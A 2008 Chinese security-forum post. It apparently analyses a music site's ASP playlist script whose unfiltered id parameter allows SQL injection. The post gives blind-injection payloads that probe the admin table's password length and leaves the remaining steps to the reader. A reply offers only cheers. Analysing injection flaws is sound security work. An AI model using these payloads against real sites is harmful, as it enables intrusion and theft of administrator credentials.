服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

dirtysea 发表于 2008-3-16 04:43:43

一段有注射漏洞的asp代码

别人丢来一段代码<BR>
<TABLE class=ubb_code cellSpacing=1 cellPadding=0 width="90%" border=0>
<TBODY>
<TR>
<TD>
<TABLE style="BORDER-RIGHT: #cccccc 1px dotted; TABLE-LAYOUT: fixed; BORDER-TOP: #cccccc 1px dotted; BORDER-LEFT: #cccccc 1px dotted; BORDER-BOTTOM: #cccccc 1px dotted" cellSpacing=0 cellPadding=6 width="95%" align=center border=0>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" bgColor=#f3f3f3><FONT style="FONT-WEIGHT: bold; COLOR: #990000">以下是引用片段:</FONT><BR>&lt;!--#include file="../user/conn.asp"--&gt;<BR>&lt;!--#include file="Path.Asp"--&gt;<BR>&lt;ASX version = "3.0"&gt;<BR>&lt;%<BR>id1=replace(request("id"),"","")<BR>if id1&lt;&gt;"" then<BR>set rs=server.createobject("adodb.recordset")<BR>id=id1<BR>sql="select * from MusicList where id in (" &amp; id &amp; ")"<BR>rs.open sql,conn,1,3<BR>rs("hits")=rs("hits")+1<BR>rs.update<BR>songpath=rs("song_path")<BR>&nbsp;&nbsp;&nbsp;&nbsp;If songpath="" or IsNull(songpath) Then<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;songpath=1<BR>&nbsp;&nbsp;&nbsp;&nbsp;End If<BR>&nbsp;&nbsp;&nbsp;&nbsp;select Case songpath<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Case 1<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;song_path=song_path1<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Case 2<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;song_path=song_path2<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Case 3<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;song_path=song_path3<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Case 4<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;song_path=song_path4<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Case 5<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;song_path=song_path5<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Case 6<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;song_path=song_path6<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Case 7<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;song_path=song_path7<BR>&nbsp;&nbsp;&nbsp;&nbsp;End select<BR>&nbsp;&nbsp;&nbsp;&nbsp;song_path=song_path&amp;rs("Wma")<BR><BR>while not rs.eof<BR>%&gt;<BR>&lt;entry SKIPIFREF="NO"&gt; <BR>&lt;title&gt;&lt;%=rs("Musicname")%&gt;&lt;/title&gt;<BR>&lt;author&gt;www.lgrx.com.cn&lt;/author&gt;<BR>&lt;copyright&gt;歌手和唱片公司所有&lt;/copyright&gt;<BR>&lt;ref href="&lt;%=song_path%&gt;"/&gt; <BR>&lt;param name="Artist" value="&lt;%=rs("Singer")%&gt;"/&gt;<BR>&lt;param name="Album" value="娱人音乐网 &lt;%=rs("hits")%&gt;人气"/&gt;<BR>&lt;param name="Title" value="&lt;%=rs("Musicname")%&gt;"/&gt;<BR>&lt;/ENTRY&gt;<BR>&lt;% <BR>rs.movenext<BR>wend<BR>rs.Close<BR>set rs=nothing<BR>end if<BR>conn.close<BR>set conn=nothing<BR>%&gt;<BR>&lt;/ASX&gt;</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>注意id,基本没过滤放到sql语句里,很简单是么?但是 <BR><BR>
<TABLE class=ubb_code cellSpacing=1 cellPadding=0 width="90%" border=0>
<TBODY>
<TR>
<TD>rs("hits")=rs("hits")+1<BR>rs.update</TD></TR></TBODY></TABLE><BR><BR>这样决定了不能union查询,因为union出来的是不可写的.....那么只能经典注射了<BR><BR>
<TABLE class=ubb_code cellSpacing=1 cellPadding=0 width="90%" border=0>
<TBODY>
<TR>
<TD>id=1) sql and 1 in (1<BR></TD></TR></TBODY></TABLE>前后的保证出来的有记录,加上中间加我们自己的sql语句,就可以注射了.这里关键表是admin,字段有 password , username<BR><BR>那么就可以这样了<BR><BR>
<TABLE class=ubb_code cellSpacing=1 cellPadding=0 width="90%" border=0>
<TBODY>
<TR>
<TD>id=1) and (select top 1 len(password) from admin)=16 and 1 in (1<BR></TD></TR></TBODY></TABLE>正常返回,语句为真,那么这个密码估计被md5了<BR><BR>后面的不说了 自己猜吧

dirtysea 发表于 2006-6-8 20:59:21

re:一段有注射漏洞的asp代码

支持万岁!
页: [1]
查看完整版本: 一段有注射漏洞的asp代码